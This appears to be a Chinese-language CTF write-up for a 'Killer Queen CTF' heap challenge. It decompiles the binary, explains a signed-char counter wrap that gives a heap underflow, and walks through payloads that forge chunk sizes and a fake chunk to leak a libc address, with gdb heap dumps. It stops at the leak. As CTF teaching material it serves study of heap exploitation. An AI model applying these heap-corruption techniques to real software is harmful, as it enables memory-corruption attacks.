killer queen ctf

SEARCHING

先看一下ida的main函数

/*
 * Program entry point (IDA decompilation of the challenge binary).
 * Runs the menu loop: 1 -> create(), 2 -> display(), 3 -> reset(), 4 -> exit.
 * Any other selection (including negative values, which still satisfy
 * v3 <= 4) matches no case and simply re-prompts.
 */
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // [rsp+Ch] [rbp-4h]

  // All three streams are unbuffered: every getc()/puts() goes straight to
  // the fd, so an exploit script sees each prompt without a flush.
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  puts("All my homies hate fufu's.");
  puts("You can use my program, but don't be fufu.\n");
  while ( 1 )
  {
    v3 = menu();              // menu() is defined elsewhere in the binary (not shown)
    if ( v3 == 4 )
      break;
    if ( v3 <= 4 )            // values > 4 are silently ignored
    {
      switch ( v3 )           // no default: 0 and negative values fall through
      {
        case 3:
          reset();
          break;
        case 1:
          create();
          break;
        case 2:
          display();
          break;
      }
    }
  }
  puts("Bye.");
  _exit(0);                   // _exit(): no atexit handlers, no stdio flush
}

看一下create函数: create先读入index, 只有index = 0才能通过检查; 然后先free掉chnk[0]原来保存的指针, 再读入size分配一个新的chunk, 最后用inbuf函数读入内容。注意size的检查 `v1 <= 199 && v1 > 1000` 永远不可能成立, 所以任何size都会被接受并原样传给malloc和inbuf。

/*
 * Menu option 1. Only index 0 is accepted, so chnk[] effectively has one slot.
 * Sequence: free() the slot's previous pointer, malloc() a chunk of the
 * requested size, then fill it through inbuf().
 *
 * Security-relevant points visible in this function:
 *  - The size check `v1 <= 199 && v1 > 1000` can never be true, so no size is
 *    ever rejected: whatever inidx() returns reaches malloc() and inbuf().
 *  - The size is forwarded to inbuf() as an int, but inbuf() counts with a
 *    `char` (see inbuf()); sizes above 127 are what make its wrap exploitable.
 *  - free() runs on the old pointer before malloc(). After reset() that
 *    pointer is NULL, so free(NULL) is a no-op and the old chunk stays alive.
 *  - The malloc() return value is not checked before being written to.
 */
int create()
{
  int v1; // [rsp+8h] [rbp-8h]   size
  int v2; // [rsp+Ch] [rbp-4h]   index (only 0 passes)

  puts("You now get to create a chunk.\n");
  puts("Which index would you like to create a chunk on?");
  v2 = inidx();                               // inidx() (not shown) reads an integer
  if ( v2 < 0 || v2 > 0 )
    return puts("Invalid index.\n");
  free(*((void **)&chnk + v2));               // frees whatever chnk[0] currently holds
  puts("What size chunk do you want?");
  v1 = inidx();
  if ( v1 <= 199 && v1 > 1000 )               // contradictory: never rejects anything
    return puts("Invalid size.\n");
  *((_QWORD *)&chnk + v2) = malloc(v1);       // unchecked result
  puts("Input content.");
  inbuf(*((_QWORD *)&chnk + v2), (unsigned int)v1);   // size passed through unchanged
  return puts("Chunk created.\n");
}

用inbuf逐字节读入输入的content, 遇到'\n'结束, 并在结尾写一个null来终止输入。
漏洞就在这里: 循环计数器 i 是 char 类型(范围 -128 到 127), 而上限 a2 是 int。当 size 大于 127 时, i 自增到 127 后回绕成 -128, 循环条件 a2 > i 仍然成立, 后面的字节会写到 a1 + i 这个负偏移处, 也就是缓冲区前面最多 128 字节的位置(下溢)。

/*
 * Reads up to a2 bytes from stdin into a1, stopping at '\n', then writes a
 * NUL terminator.
 *
 * The loop counter `i` is a `char` while the bound `a2` is an int. With a
 * signed char (x86-64 Linux, confirmed by the heap dumps in this writeup)
 * `++i` past 127 wraps to -128, so for any a2 > 127 the condition `a2 > i`
 * can never become false and subsequent bytes are stored at a1 + i with a
 * NEGATIVE offset: up to 128 bytes BEFORE the buffer. Only a '\n' ends such a
 * read. This is the "underflow" used below to rewrite neighbouring chunk
 * headers.
 *
 * Two further quirks visible here:
 *  - When a2 <= 127 and the loop ends on the bound, i == a2 and the
 *    terminator is written at a1[a2], one byte past the requested size
 *    (whether that reaches the next chunk header depends on malloc's rounding).
 *  - getc() returns int; EOF (-1) is stored as byte 0xff and does not stop
 *    the loop.
 */
int __fastcall inbuf(__int64 a1, int a2)
{
  char i; // [rsp+1Fh] [rbp-1h]   8-bit counter compared against an int bound

  for ( i = 0; a2 > i; ++i )
  {
    *(_BYTE *)(i + a1) = getc(stdin);   // i is sign-extended: negative i writes below a1
    if ( *(_BYTE *)(i + a1) == 10 )     // '\n' terminates input
      break;
  }
  *(_BYTE *)(i + a1) = 0;               // terminator lands wherever i stopped (possibly below a1)
  return puts(&s);                      // s: global string defined elsewhere (not shown)
}

这是display函数,然后输出

/*
 * Menu option 2. Prints chnk[0] with puts(), i.e. everything up to the first
 * NUL byte. puts() knows nothing about the chunk's size, so any bytes that
 * follow the user data up to a NUL are printed too. This is the read
 * primitive the writeup uses to leak libc: the underflow fills the bytes up
 * to an adjacent freed chunk's fd/bk with non-NUL data, and puts() runs on
 * into those pointers.
 * If chnk[0] is NULL (after reset()), NULL is handed to puts().
 */
int display()
{
  int v1; // [rsp+Ch] [rbp-4h]

  puts("You now get to display a chunk.\n");
  puts("Which index would you like to dispaly?");
  v1 = inidx();
  if ( v1 < 0 || v1 > 0 )
    return puts("Invalid index.\n");
  puts("Your chunk shows:");
  puts(*((const char **)&chnk + v1));   // unbounded: reads until the first NUL
  return puts("\nChunk displayed.\n");
}

reset只是把chnk[0]置为0, 并不会free这个chunk。这样下一次create里的free(chnk[0])就变成free(NULL)(空操作), 原来的chunk不会被释放, 内容也保留着, 可以一直保持分配状态。

/*
 * Menu option 3. Sets chnk[0] = NULL WITHOUT freeing the chunk.
 * The chunk therefore stays allocated with its contents intact, and the next
 * create() calls free(NULL) (a no-op) instead of freeing it. The writeup uses
 * this to keep several chunks alive even though only one slot exists.
 */
int reset()
{
  int v1; // [rsp+Ch] [rbp-4h]

  puts("You now get to reset a chunk.\n");
  puts("Which index would you like to reset?");
  v1 = inidx();
  if ( v1 < 0 || v1 > 0 )
    return puts("Invalid index.\n");
  chnk[v1] = 0LL;   // pointer dropped, no free(): the chunk is leaked on purpose
  return puts("Chunk reset.\n");
}

思路就是:
创造一个size为0x420的chunk
free它
创造overlap去泄露libc
创造三个chunk,两个free一个已分配

EXPLOITATION

exp:
泄露libc
首先申请三个chunk,然后不管,反正已经分配了

create(0,0x10,b'aAA') <--- chunk D
create(0,0x40, b'VVV') <--- chunk E

create(0,0x90,"FFFFFF") <--- chunk F

通常要得到libc地址会用unsorted bin: malloc一个足够大的chunk(超过tcache能放的大小), free它时会进入unsorted bin, fd和bk会被写成libc(main_arena)里的地址。问题是现在直接free一个大chunk时它后面紧挨着top chunk, 会被合并进top chunk, 拿不到fd/bk。
所以思路是先申请若干个chunk, 让它们加起来的大小超过0x408, 然后用下溢把第一个chunk的size改成0x421并free掉它。这样在我们改了size的chunk和top chunk之间至少隔着一个仍在使用的chunk, 就不会发生合并。

create(0,0x60,0x20*b'A') <----- chunk A. We will resize this one to 0x421
create(0,0x200,0x20*b'B') <---- chunk B. This one we will use to perform the underflow

create(0,0x70,0x70*b'C') 
reset(0)
create(0,0x70,0x70*b'C')
reset(0)
create(0,0x70,0x70*b'G')
reset(0)
payload= b'R'*16
payload += p64(0x420)
payload += p64(0x61)
payload += p64(0)
payload += p64(0)
create(0,0x70,payload) <------- chunk C. Inside this one we create a fake chunk to pass the chek for freeing into unsorted bin


reset(0)
payload = b'B' * 0x7e <------ payload to overflow char
payload += b"\x00" * 10 <-------- some padding so the next line lands on the size of chunk A
payload += p64(0x421) <----- this will overwrite the size of chunk A to 0x421 using the underflow
create(0,0x200,payload) <---- chunk B that is returned from tcache

chunk C 和 chunk B 的布局是这样安排的: 当 A 的 size 被改成 0x421 并被 free 时, A + 0x420 这个地址正好落在我们在 chunk C 里构造的 fake chunk(prev_size = 0x420, size = 0x61)上, 从而通过 free 对下一个chunk的检查。

0x56257ccda3a0: 0x0000000000000000  0x0000000000000071 <--- chunk A
0x56257ccda3b0: 0x0000000000000000  0x000056257ccda010 
0x56257ccda3c0: 0x4141414141414141  0x4141414141414141
0x56257ccda3d0: 0x0000000000000000  0x0000000000000000
0x56257ccda3e0: 0x0000000000000000  0x0000000000000000
0x56257ccda3f0: 0x0000000000000000  0x0000000000000000
0x56257ccda400: 0x0000000000000000  0x0000000000000000
0x56257ccda410: 0x0000000000000000  0x0000000000000211 <--- chunk B
0x56257ccda420: 0x4242424242424242  0x4242424242424242
0x56257ccda430: 0x4242424242424242  0x4242424242424242
0x56257ccda440: 0x0000000000000000  0x0000000000000000
0x56257ccda450: 0x0000000000000000  0x0000000000000000
0x56257ccda460: 0x0000000000000000  0x0000000000000000
0x56257ccda470: 0x0000000000000000  0x0000000000000000
0x56257ccda480: 0x0000000000000000  0x0000000000000000
0x56257ccda490: 0x0000000000000000  0x0000000000000000
0x56257ccda4a0: 0x0000000000000000  0x0000000000000000
0x56257ccda620: 0x0000000000000000  0x0000000000000081
0x56257ccda630: 0x4343434343434343  0x4343434343434343
0x56257ccda640: 0x4343434343434343  0x4343434343434343
0x56257ccda650: 0x4343434343434343  0x4343434343434343
0x56257ccda660: 0x4343434343434343  0x4343434343434343
0x56257ccda670: 0x4343434343434343  0x4343434343434343
0x56257ccda680: 0x4343434343434343  0x4343434343434343
0x56257ccda690: 0x4343434343434343  0x4343434343434343
0x56257ccda6a0: 0x0000000000000000  0x0000000000000081
0x56257ccda6b0: 0x4343434343434343  0x4343434343434343
0x56257ccda6c0: 0x4343434343434343  0x4343434343434343
0x56257ccda6d0: 0x4343434343434343  0x4343434343434343
0x56257ccda6e0: 0x4343434343434343  0x4343434343434343
0x56257ccda6f0: 0x4343434343434343  0x4343434343434343
0x56257ccda700: 0x4343434343434343  0x4343434343434343
0x56257ccda710: 0x4343434343434343  0x4343434343434343
0x56257ccda720: 0x0000000000000000  0x0000000000000081
0x56257ccda730: 0x4747474747474747  0x4747474747474747
0x56257ccda740: 0x4747474747474747  0x4747474747474747
0x56257ccda750: 0x4747474747474747  0x4747474747474747
0x56257ccda760: 0x4747474747474747  0x4747474747474747
0x56257ccda770: 0x4747474747474747  0x4747474747474747
0x56257ccda780: 0x4747474747474747  0x4747474747474747
0x56257ccda790: 0x4747474747474747  0x4747474747474747
0x56257ccda7a0: 0x0000000000000000  0x0000000000000081
0x56257ccda7b0: 0x5252525252525252  0x5252525252525252
0x56257ccda7c0: 0x0000000000000420  0x0000000000000061 <--- fake chunk to pass the check
0x56257ccda7d0: 0x0000000000000000  0x0000000000000000
0x56257ccda7e0: 0x0000000000000000  0x0000000000000000
0x56257ccda7f0: 0x0000000000000000  0x0000000000000000
0x56257ccda800: 0x0000000000000000  0x0000000000000000
0x56257ccda810: 0x0000000000000000  0x0000000000000000
0x56257ccda820: 0x0000000000000000  0x00000000000207e1 <--- top chunk

修改后

0x56257ccda3a0: 0x0000000000000000  0x0000000000000421 <--- chunk A that we resized using the underflow
0x56257ccda3b0: 0x0000000000000000  0x000056257ccda010
0x56257ccda3c0: 0x4141414141414141  0x4141414141414141
0x56257ccda3d0: 0x0000000000000000  0x0000000000000000
0x56257ccda3e0: 0x0000000000000000  0x0000000000000000
0x56257ccda3f0: 0x0000000000000000  0x0000000000000000
0x56257ccda400: 0x0000000000000000  0x0000000000000000
0x56257ccda410: 0x0000000000000000  0x0000000000000211
0x56257ccda420: 0x4242424242424242  0x4242424242424242
0x56257ccda430: 0x4242424242424242  0x4242424242424242
0x56257ccda440: 0x4242424242424242  0x4242424242424242
0x56257ccda450: 0x4242424242424242  0x4242424242424242
0x56257ccda460: 0x4242424242424242  0x4242424242424242
0x56257ccda470: 0x4242424242424242  0x4242424242424242
0x56257ccda480: 0x4242424242424242  0x4242424242424242
0x56257ccda490: 0x4242424242424242  0x0000424242424242
0x56257ccda4a0: 0x0000000000000000  0x0000000000000000
0x56257ccda4b0: 0x0000000000000000  0x0000000000000000
0x56257ccda4c0: 0x0000000000000000  0x0000000000000000
0x56257ccda4d0: 0x0000000000000000  0x0000000000000000
0x56257ccda4e0: 0x0000000000000000  0x0000000000000000
0x56257ccda4f0: 0x0000000000000000  0x0000000000000000
0x56257ccda500: 0x0000000000000000  0x0000000000000000
0x56257ccda510: 0x0000000000000000  0x0000000000000000
0x56257ccda520: 0x0000000000000000  0x0000000000000000
0x56257ccda530: 0x0000000000000000  0x0000000000000000
0x56257ccda540: 0x0000000000000000  0x0000000000000000
0x56257ccda550: 0x0000000000000000  0x0000000000000000
0x56257ccda560: 0x0000000000000000  0x0000000000000000
0x56257ccda570: 0x0000000000000000  0x0000000000000000
0x56257ccda580: 0x0000000000000000  0x0000000000000000
0x56257ccda590: 0x0000000000000000  0x0000000000000000
0x56257ccda5a0: 0x0000000000000000  0x0000000000000000
0x56257ccda5b0: 0x0000000000000000  0x0000000000000000
0x56257ccda5c0: 0x0000000000000000  0x0000000000000000
0x56257ccda5d0: 0x0000000000000000  0x0000000000000000
0x56257ccda5e0: 0x0000000000000000  0x0000000000000000
0x56257ccda5f0: 0x0000000000000000  0x0000000000000000
0x56257ccda600: 0x0000000000000000  0x0000000000000000
0x56257ccda610: 0x0000000000000000  0x0000000000000000
0x56257ccda620: 0x0000000000000000  0x0000000000000081
0x56257ccda630: 0x4343434343434343  0x4343434343434343
0x56257ccda640: 0x4343434343434343  0x4343434343434343
0x56257ccda650: 0x4343434343434343  0x4343434343434343
0x56257ccda660: 0x4343434343434343  0x4343434343434343
0x56257ccda670: 0x4343434343434343  0x4343434343434343
0x56257ccda680: 0x4343434343434343  0x4343434343434343
0x56257ccda690: 0x4343434343434343  0x4343434343434343
0x56257ccda6a0: 0x0000000000000000  0x0000000000000081
0x56257ccda6b0: 0x4343434343434343  0x4343434343434343
0x56257ccda6c0: 0x4343434343434343  0x4343434343434343
0x56257ccda6d0: 0x4343434343434343  0x4343434343434343
0x56257ccda6e0: 0x4343434343434343  0x4343434343434343
0x56257ccda6f0: 0x4343434343434343  0x4343434343434343
0x56257ccda700: 0x4343434343434343  0x4343434343434343
0x56257ccda710: 0x4343434343434343  0x4343434343434343
0x56257ccda720: 0x0000000000000000  0x0000000000000081
0x56257ccda730: 0x4747474747474747  0x4747474747474747
0x56257ccda740: 0x4747474747474747  0x4747474747474747
0x56257ccda750: 0x4747474747474747  0x4747474747474747
0x56257ccda760: 0x4747474747474747  0x4747474747474747
0x56257ccda770: 0x4747474747474747  0x4747474747474747
0x56257ccda780: 0x4747474747474747  0x4747474747474747
0x56257ccda790: 0x4747474747474747  0x4747474747474747
0x56257ccda7a0: 0x0000000000000000  0x0000000000000081
0x56257ccda7b0: 0x5252525252525252  0x5252525252525252
0x56257ccda7c0: 0x0000000000000420  0x0000000000000061 
0x56257ccda7d0: 0x0000000000000000  0x0000000000000000
0x56257ccda7e0: 0x0000000000000000  0x0000000000000000
0x56257ccda7f0: 0x0000000000000000  0x0000000000000000
0x56257ccda800: 0x0000000000000000  0x0000000000000000
0x56257ccda810: 0x0000000000000000  0x0000000000000000
0x56257ccda820: 0x0000000000000000  0x00000000000207e1

现在chunk A的size已经是0x421, 可以free它了。但此时chnk[0]指向的是B, create会先free掉chnk[0], 所以要先用一次create把A从tcache里malloc回来, 再用下一次create去free它:

create(0,0x60,0x8*b'F')
create(0,0xe0,b'WWWWWWWW')

create(0,0x60)会先free掉B, 然后malloc(0x60)从tcache[0x70]里把A拿回来——尽管A的size字段已经被改成0x421, tcache取chunk时不会重新检查size, 因为A当初是按0x70 free进tcache的。接着create(0,0xe0)先free A: 这次按0x421计算, 超过tcache范围, 进入unsorted bin; 然后malloc(0xe0)从unsorted bin里切出一块, 剩下的0x330留在unsorted bin里, 它的fd/bk指向libc。
然后申请0xe0
这样,内存分布为

0x56257ccda3a0: 0x0000000000000000  0x00000000000000f1 <--- the new chunk size 0xe0 we just allocated
0x56257ccda3b0: 0x5757575757575757  0x00007f6a2f4adf00
0x56257ccda3c0: 0x000056257ccda3a0  0x000056257ccda3a0
0x56257ccda3d0: 0x0000000000000000  0x0000000000000000
0x56257ccda3e0: 0x0000000000000000  0x0000000000000000
0x56257ccda3f0: 0x0000000000000000  0x0000000000000000
0x56257ccda400: 0x0000000000000000  0x0000000000000000
0x56257ccda410: 0x0000000000000000  0x0000000000000211 <--- chunk B - still freed
0x56257ccda420: 0x0000000000000000  0x000056257ccda010
0x56257ccda430: 0x4242424242424242  0x4242424242424242
0x56257ccda440: 0x4242424242424242  0x4242424242424242
0x56257ccda450: 0x4242424242424242  0x4242424242424242
0x56257ccda460: 0x4242424242424242  0x4242424242424242
0x56257ccda470: 0x4242424242424242  0x4242424242424242
0x56257ccda480: 0x4242424242424242  0x4242424242424242
0x56257ccda490: 0x4242424242424242  0x0000000000000331 <--- chunk A that shrunk 
0x56257ccda4a0: 0x00007f6a2f4adbe0  0x00007f6a2f4adbe0 <--- libc address we are trying to leak
0x56257ccda4b0: 0x0000000000000000  0x0000000000000000
0x56257ccda4c0: 0x0000000000000000  0x0000000000000000
0x56257ccda4d0: 0x0000000000000000  0x0000000000000000
0x56257ccda4e0: 0x0000000000000000  0x0000000000000000
0x56257ccda4f0: 0x0000000000000000  0x0000000000000000
0x56257ccda500: 0x0000000000000000  0x0000000000000000
0x56257ccda510: 0x0000000000000000  0x0000000000000000
0x56257ccda520: 0x0000000000000000  0x0000000000000000
0x56257ccda530: 0x0000000000000000  0x0000000000000000
0x56257ccda540: 0x0000000000000000  0x0000000000000000
0x56257ccda550: 0x0000000000000000  0x0000000000000000
0x56257ccda560: 0x0000000000000000  0x0000000000000000
0x56257ccda570: 0x0000000000000000  0x0000000000000000
0x56257ccda580: 0x0000000000000000  0x0000000000000000
0x56257ccda590: 0x0000000000000000  0x0000000000000000
0x56257ccda5a0: 0x0000000000000000  0x0000000000000000
0x56257ccda5b0: 0x0000000000000000  0x0000000000000000
0x56257ccda5c0: 0x0000000000000000  0x0000000000000000
0x56257ccda5d0: 0x0000000000000000  0x0000000000000000
0x56257ccda5e0: 0x0000000000000000  0x0000000000000000
0x56257ccda5f0: 0x0000000000000000  0x0000000000000000
0x56257ccda600: 0x0000000000000000  0x0000000000000000
0x56257ccda610: 0x0000000000000000  0x0000000000000000
0x56257ccda620: 0x0000000000000000  0x0000000000000081
0x56257ccda630: 0x4343434343434343  0x4343434343434343
0x56257ccda640: 0x4343434343434343  0x4343434343434343
0x56257ccda650: 0x4343434343434343  0x4343434343434343
0x56257ccda660: 0x4343434343434343  0x4343434343434343
0x56257ccda670: 0x4343434343434343  0x4343434343434343
0x56257ccda680: 0x4343434343434343  0x4343434343434343
0x56257ccda690: 0x4343434343434343  0x4343434343434343
0x56257ccda6a0: 0x0000000000000000  0x0000000000000081
0x56257ccda6b0: 0x4343434343434343  0x4343434343434343
0x56257ccda6c0: 0x4343434343434343  0x4343434343434343
0x56257ccda6d0: 0x4343434343434343  0x4343434343434343
0x56257ccda6e0: 0x4343434343434343  0x4343434343434343
0x56257ccda6f0: 0x4343434343434343  0x4343434343434343
0x56257ccda700: 0x4343434343434343  0x4343434343434343
0x56257ccda710: 0x4343434343434343  0x4343434343434343
0x56257ccda720: 0x0000000000000000  0x0000000000000081
0x56257ccda730: 0x4747474747474747  0x4747474747474747
0x56257ccda740: 0x4747474747474747  0x4747474747474747
0x56257ccda750: 0x4747474747474747  0x4747474747474747
0x56257ccda760: 0x4747474747474747  0x4747474747474747
0x56257ccda770: 0x4747474747474747  0x4747474747474747
0x56257ccda780: 0x4747474747474747  0x4747474747474747
0x56257ccda790: 0x4747474747474747  0x4747474747474747
0x56257ccda7a0: 0x0000000000000000  0x0000000000000081
0x56257ccda7b0: 0x5252525252525252  0x5252525252525252
0x56257ccda7c0: 0x0000000000000330  0x0000000000000060
0x56257ccda7d0: 0x0000000000000000  0x0000000000000000
0x56257ccda7e0: 0x0000000000000000  0x0000000000000000
0x56257ccda7f0: 0x0000000000000000  0x0000000000000000
0x56257ccda800: 0x0000000000000000  0x0000000000000000
0x56257ccda810: 0x0000000000000000  0x0000000000000000
0x56257ccda820: 0x0000000000000000  0x00000000000207e1

为什么选0xe0: 切出0xf0的chunk之后, 剩余chunk的头部正好落在0x...490, 也就是chunk B的数据区(0x...420)往后0x80字节处。这样下一步往B里写满128个'B'时, 刚好把0x...498处size字段里的null字节也盖掉, puts就能一直读到0x...4a0的libc指针。选大一点或小一点, libc指针就对不上这个偏移, 下一步的泄露会失败。
现在我们malloc chunkB

payload = 0x80 * 'B'
create(0,0x200,payload)

现在把B malloc回来(从tcache里取出), libc指针相对于B的数据区往下移到了偏移0x80处, 然后我们往B里写128个byte, 这正好是inbuf计数器能正常计数的上限。写完第128个字节后计数器 i 回绕成 -128(对应Ghidra里的local_9 = -128), 之后的终止符会写到 0x56257ccda420 + (-128) = 0x56257ccda3a0, 落在前面那个0xf0 chunk的prev_size字段上, 而不是截断我们的数据。

0x56257ccda3a0: 0x0000000000000000  0x00000000000000f1 
0x56257ccda3b0: 0x0000000000000000  0x000056257ccda010
0x56257ccda3c0: 0x000056257ccda3a0  0x000056257ccda3a0
0x56257ccda3d0: 0x0000000000000000  0x0000000000000000
0x56257ccda3e0: 0x0000000000000000  0x0000000000000000
0x56257ccda3f0: 0x0000000000000000  0x0000000000000000
0x56257ccda400: 0x0000000000000000  0x0000000000000000
0x56257ccda410: 0x0000000000000000  0x0000000000000211 <--- chunk B that we just malloced back from tcache
0x56257ccda420: 0x4242424242424242  0x4242424242424242 <--- the 0x80 or 128 Bs we wrote
0x56257ccda430: 0x4242424242424242  0x4242424242424242
0x56257ccda440: 0x4242424242424242  0x4242424242424242
0x56257ccda450: 0x4242424242424242  0x4242424242424242
0x56257ccda460: 0x4242424242424242  0x4242424242424242
0x56257ccda470: 0x4242424242424242  0x4242424242424242
0x56257ccda480: 0x4242424242424242  0x4242424242424242
0x56257ccda490: 0x4242424242424242  0x4242424242424242 <--- chunk A that overlaps with chunk B
0x56257ccda4a0: 0x00007f6a2f4adbe0  0x00007f6a2f4adbe0 <--- pointers are still here
0x56257ccda4b0: 0x0000000000000000  0x0000000000000000
0x56257ccda4c0: 0x0000000000000000  0x0000000000000000
0x56257ccda4d0: 0x0000000000000000  0x0000000000000000
0x56257ccda4e0: 0x0000000000000000  0x0000000000000000
0x56257ccda4f0: 0x0000000000000000  0x0000000000000000
0x56257ccda500: 0x0000000000000000  0x0000000000000000
0x56257ccda510: 0x0000000000000000  0x0000000000000000
0x56257ccda520: 0x0000000000000000  0x0000000000000000
0x56257ccda530: 0x0000000000000000  0x0000000000000000
0x56257ccda540: 0x0000000000000000  0x0000000000000000
0x56257ccda550: 0x0000000000000000  0x0000000000000000
0x56257ccda560: 0x0000000000000000  0x0000000000000000
0x56257ccda570: 0x0000000000000000  0x0000000000000000
0x56257ccda580: 0x0000000000000000  0x0000000000000000
0x56257ccda590: 0x0000000000000000  0x0000000000000000
0x56257ccda5a0: 0x0000000000000000  0x0000000000000000
0x56257ccda5b0: 0x0000000000000000  0x0000000000000000
0x56257ccda5c0: 0x0000000000000000  0x0000000000000000
0x56257ccda5d0: 0x0000000000000000  0x0000000000000000
0x56257ccda5e0: 0x0000000000000000  0x0000000000000000
0x56257ccda5f0: 0x0000000000000000  0x0000000000000000
0x56257ccda600: 0x0000000000000000  0x0000000000000000
0x56257ccda610: 0x0000000000000000  0x0000000000000000
0x56257ccda620: 0x0000000000000000  0x0000000000000081
0x56257ccda630: 0x4343434343434343  0x4343434343434343
0x56257ccda640: 0x4343434343434343  0x4343434343434343
0x56257ccda650: 0x4343434343434343  0x4343434343434343
0x56257ccda660: 0x4343434343434343  0x4343434343434343
0x56257ccda670: 0x4343434343434343  0x4343434343434343
0x56257ccda680: 0x4343434343434343  0x4343434343434343
0x56257ccda690: 0x4343434343434343  0x4343434343434343
0x56257ccda6a0: 0x0000000000000000  0x0000000000000081
0x56257ccda6b0: 0x4343434343434343  0x4343434343434343
0x56257ccda6c0: 0x4343434343434343  0x4343434343434343
0x56257ccda6d0: 0x4343434343434343  0x4343434343434343
0x56257ccda6e0: 0x4343434343434343  0x4343434343434343
0x56257ccda6f0: 0x4343434343434343  0x4343434343434343
0x56257ccda700: 0x4343434343434343  0x4343434343434343
0x56257ccda710: 0x4343434343434343  0x4343434343434343
0x56257ccda720: 0x0000000000000000  0x0000000000000081
0x56257ccda730: 0x4747474747474747  0x4747474747474747
0x56257ccda740: 0x4747474747474747  0x4747474747474747
0x56257ccda750: 0x4747474747474747  0x4747474747474747
0x56257ccda760: 0x4747474747474747  0x4747474747474747
0x56257ccda770: 0x4747474747474747  0x4747474747474747
0x56257ccda780: 0x4747474747474747  0x4747474747474747
0x56257ccda790: 0x4747474747474747  0x4747474747474747
0x56257ccda7a0: 0x0000000000000000  0x0000000000000081
0x56257ccda7b0: 0x5252525252525252  0x5252525252525252
0x56257ccda7c0: 0x0000000000000330  0x0000000000000060
0x56257ccda7d0: 0x0000000000000000  0x0000000000000000
0x56257ccda7e0: 0x0000000000000000  0x0000000000000000
0x56257ccda7f0: 0x0000000000000000  0x0000000000000000
0x56257ccda800: 0x0000000000000000  0x0000000000000000
0x56257ccda810: 0x0000000000000000  0x0000000000000000
0x56257ccda820: 0x0000000000000000  0x00000000000207e1

然后可以泄露

display(0)

leak后的堆地址

0x56257ccda290: 0x0000000000000000  0x0000000000000021 <--- chunk D free
0x56257ccda2a0: 0x0000000000000000  0x000056257ccda010
0x56257ccda2b0: 0x0000000000000000  0x0000000000000051 <--- chunk E free
0x56257ccda2c0: 0x0000000000000000  0x000056257ccda010
0x56257ccda2d0: 0x0000000000000000  0x0000000000000000
0x56257ccda2e0: 0x0000000000000000  0x0000000000000000
0x56257ccda2f0: 0x0000000000000000  0x0000000000000000
0x56257ccda300: 0x0000000000000000  0x00000000000000a1 <--- chunk F free
0x56257ccda310: 0x0000000000000000  0x000056257ccda010
0x56257ccda320: 0x0000000000000000  0x0000000000000000
0x56257ccda330: 0x0000000000000000  0x0000000000000000
0x56257ccda340: 0x0000000000000000  0x0000000000000000
0x56257ccda350: 0x0000000000000000  0x0000000000000000
0x56257ccda360: 0x0000000000000000  0x0000000000000000
0x56257ccda370: 0x0000000000000000  0x0000000000000000
0x56257ccda380: 0x0000000000000000  0x0000000000000000
0x56257ccda390: 0x0000000000000000  0x0000000000000000
0x56257ccda3a0: 0x0000000000000000  0x00000000000000f1 <--- chunk we used to push down the pointers size 0xe0
0x56257ccda3b0: 0x0000000000000000  0x000056257ccda010
0x56257ccda3c0: 0x000056257ccda3a0  0x000056257ccda3a0
0x56257ccda3d0: 0x0000000000000000  0x0000000000000000
0x56257ccda3e0: 0x0000000000000000  0x0000000000000000
0x56257ccda3f0: 0x0000000000000000  0x0000000000000000
0x56257ccda400: 0x0000000000000000  0x0000000000000000
0x56257ccda410: 0x0000000000000000  0x0000000000000211 <--- chunk B
0x56257ccda420: 0x4242424242424242  0x4242424242424242
0x56257ccda430: 0x4242424242424242  0x4242424242424242
0x56257ccda440: 0x4242424242424242  0x4242424242424242
0x56257ccda450: 0x4242424242424242  0x4242424242424242
0x56257ccda460: 0x4242424242424242  0x4242424242424242
0x56257ccda470: 0x4242424242424242  0x4242424242424242
0x56257ccda480: 0x4242424242424242  0x4242424242424242
0x56257ccda490: 0x4242424242424242  0x4242424242424242 <--- chunk A
0x56257ccda4a0: 0x00007f6a2f4adbe0  0x00007f6a2f4adbe0
0x56257ccda4b0: 0x0000000000000000  0x0000000000000000
0x56257ccda4c0: 0x0000000000000000  0x0000000000000000
0x56257ccda4d0: 0x0000000000000000  0x0000000000000000
0x56257ccda4e0: 0x0000000000000000  0x0000000000000000
0x56257ccda4f0: 0x0000000000000000  0x0000000000000000
0x56257ccda500: 0x0000000000000000  0x0000000000000000
0x56257ccda510: 0x0000000000000000  0x0000000000000000
0x56257ccda520: 0x0000000000000000  0x0000000000000000
0x56257ccda530: 0x0000000000000000  0x0000000000000000
0x56257ccda540: 0x0000000000000000  0x0000000000000000
0x56257ccda550: 0x0000000000000000  0x0000000000000000
0x56257ccda560: 0x0000000000000000  0x0000000000000000
0x56257ccda570: 0x0000000000000000  0x0000000000000000
0x56257ccda580: 0x0000000000000000  0x0000000000000000
0x56257ccda590: 0x0000000000000000  0x0000000000000000
0x56257ccda5a0: 0x0000000000000000  0x0000000000000000
0x56257ccda5b0: 0x0000000000000000  0x0000000000000000
0x56257ccda5c0: 0x0000000000000000  0x0000000000000000
0x56257ccda5d0: 0x0000000000000000  0x0000000000000000
0x56257ccda5e0: 0x0000000000000000  0x0000000000000000
0x56257ccda5f0: 0x0000000000000000  0x0000000000000000
0x56257ccda600: 0x0000000000000000  0x0000000000000000
0x56257ccda610: 0x0000000000000000  0x0000000000000000
0x56257ccda620: 0x0000000000000000  0x0000000000000081
0x56257ccda630: 0x4343434343434343  0x4343434343434343
0x56257ccda640: 0x4343434343434343  0x4343434343434343
0x56257ccda650: 0x4343434343434343  0x4343434343434343
0x56257ccda660: 0x4343434343434343  0x4343434343434343
0x56257ccda670: 0x4343434343434343  0x4343434343434343
0x56257ccda680: 0x4343434343434343  0x4343434343434343
0x56257ccda690: 0x4343434343434343  0x4343434343434343
0x56257ccda6a0: 0x0000000000000000  0x0000000000000081
0x56257ccda6b0: 0x4343434343434343  0x4343434343434343
0x56257ccda6c0: 0x4343434343434343  0x4343434343434343
0x56257ccda6d0: 0x4343434343434343  0x4343434343434343
0x56257ccda6e0: 0x4343434343434343  0x4343434343434343
0x56257ccda6f0: 0x4343434343434343  0x4343434343434343
0x56257ccda700: 0x4343434343434343  0x4343434343434343
0x56257ccda710: 0x4343434343434343  0x4343434343434343
0x56257ccda720: 0x0000000000000000  0x0000000000000081
0x56257ccda730: 0x4747474747474747  0x4747474747474747
0x56257ccda740: 0x4747474747474747  0x4747474747474747
0x56257ccda750: 0x4747474747474747  0x4747474747474747
0x56257ccda760: 0x4747474747474747  0x4747474747474747
0x56257ccda770: 0x4747474747474747  0x4747474747474747
